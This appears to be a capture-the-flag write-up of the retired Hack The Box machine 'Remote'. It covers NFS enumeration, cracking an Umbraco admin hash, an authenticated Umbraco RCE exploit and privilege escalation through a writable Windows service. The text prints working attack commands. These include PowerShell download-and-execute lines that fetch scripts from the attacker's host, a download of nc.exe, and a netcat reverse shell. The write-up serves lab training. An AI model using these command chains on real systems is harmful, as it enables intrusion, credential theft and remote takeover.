Hack The Box — Remote Write-up

Summary

Remote is a Windows box of easy difficulty from Hack The Box platform that was retired at 5 September 2020 at 19:00:00 UTC. The process to pwn this box is basically based on enumeration and exploit of a vulnerability in Umbraco CMS web application. Besides, we have the opportunity to use a PowerSploit script in order to abuse a vulnerable service running on the target.

Scanning and Enumeration

After adding an entry in our /etc/hosts file, we perform a typical scanning to check which ports are open.

$ports=$(sudo nmap -p- --min-rate=1000 -T4 remote.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$sudo nmap -p$ports -T4 -Pn -A remote.htb

The result is a bunch of open ports:

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2016 (92%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows Server 2016 build 10586 - 14393 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m37s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-18T20:40:34
|_  start_date: N/A

NFS

From the results above, we can see that the target has some NFS (Network File System) share. We have some alternatives to check it out. For instance, we can use a nmap script:

$nmap --script nfs-showmount -p111 remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 21:44 -03
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.16s latency).
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /site_backups

We can also use showmount as follows:

$showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Next step is to mount this file share into our system:

$sudo mount -t nfs remote.htb:/site_backups /tmp/nfs

Navigating through the mounted share we can find a file called Umbraco.sdf.

Now, sdf is an extension for database files used by SQL Server Compact Edition, which means it could contains data about the application it belongs to. Before going to third party tools to handle this kind of file, we should try extracting strings from it.

Nice shot! We have a SHA1 hashed password (very likely) for user admin@htb.local. Submitting this hash to CrackStation we get the original clear text: baconandcheese.

Enumerating a little more the NFS share we’ve mounted, particularly the file at App_Data/Logs/UmbracoTraceLog.remote.txt, we can see a reference to an application running at http://192.168.195.149:80/umbraco.

HTTP

This is the web page we are presented to by visiting http://remote.htb:

However, if we go to http://remtote.htb/umbraco we are presented to a login page. There, we can use the credentials we have found in the previous step: admin@htb.local:baconandcheese.

Once in the application, we can find the exact version for the Umbraco web application, which is 7.12.4.

Getting a Foothold

A Google search returned an exploit for this version that allows us to perform remote code execution on the target:
https://github.com/noraj/Umbraco-RCE: Umbraco CMS 7.12.4 — (Authenticated) Remote Code Execution.

Examples from repository:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

We can check this exploit with the credentials we have:

$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c whoami
iis apppool\defaultapppool
$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "Get-Command nc"
Get-Command : The term 'nc' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-Command nc
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (nc:String) [Get-Command], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.GetCommandCommand

From the two commands above, we see that we can execute commands remotely as iis apppool\defaultapppool and we don’t have nc command on the target.

Owning User

The user flag can be grabbed straight from the exploit, just sending a proper command to read the file:

$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "Get-Content C:\\\\Users\\\\Public\\\\user.txt

Owning System

In order to get admin access to the system, we start by performing a priviesc check using PowerUp.ps1 script.

$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.15:8000/Privesc/PowerUp.ps1'); Invoke-Allchecks"

In the above command, we have instructed the target to download the script from the web server running in our machine and running it directly from memory (no disk footprint).

The command output is listed below:

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


ServiceName                     : UsoSvc
Path                            : c:\windows\temp\badhappy41.exe
ModifiableFile                  : C:\windows\temp\badhappy41.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : IIS APPPOOL\DefaultAppPool
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'UsoSvc'
CanRestart                      : True





[*] Checking service permissions...


ServiceName   : UsoSvc
Path          : c:\windows\temp\badhappy41.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True





[*] Checking %PATH% for potentially hijackable DLL locations...
Test-Path : Access is denied
At line:856 char:46
+ ...                  if($ParentPath -and (Test-Path -Path $ParentPath)) {
+                                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Windows\syst...Local\Microsoft:String) [Test-Path], UnauthorizedAc 
   cessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.TestPathCommand
 


[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


[*] Checking for modifidable registry autoruns and configs...


[*] Checking for modifiable schtask files/configs...


[*] Checking for unattended install files...


UnattendPath : C:\Windows\Panther\Unattend.xml





[*] Checking for encrypted web.config strings...


[*] Checking for encrypted application pool and virtual directory passwords...


[*] Checking for plaintext passwords in McAfee SiteList.xml files....

Next step is to abuse the service listed above in order to get a root shell (Invoke-ServiceAbuse -Name 'UsoSvc').

Preparation

First, we need to know which files/directories we have permission to write to.

$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.15:8000/Privesc/PowerUp.ps1'); Get-ChildItem -R 'C:/site_backups' | Get-ModifiablePath"

The output contains several paths, one being C:\site_backups\App_Data\TEMP.

Let’s use the exploit to instruct the target to download the netcat binary from our server:

$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "(New-Object Net.WebClient).DownloadFile('http://10.10.15.15:8000/nc.exe', 'C:/site_backups/App_Data/TEMP/nc.exe')"

Finally, we abuse the vulnerable service in order to get a reverse shell:

$python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.15:8000/PowerUp.ps1'); Invoke-ServiceAbuse -Name 'UsoSvc' -Command 'C:/site_backups/App_Data/TEMP/nc.exe 10.10.15.15 80 -e C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'"
ServiceAbused Command                                                                                                  
------------- -------                                                                                                  
UsoSvc        C:/site_backups/App_Data/TEMP/nc.exe 10.10.15.15 80 -e C:\Windows\System32\WindowsPowerShell\v1.0\...

That’s it! Once connected to the target as Administrator, just grab the root flag at C:\Users\Administrator\Desktop\root.txt.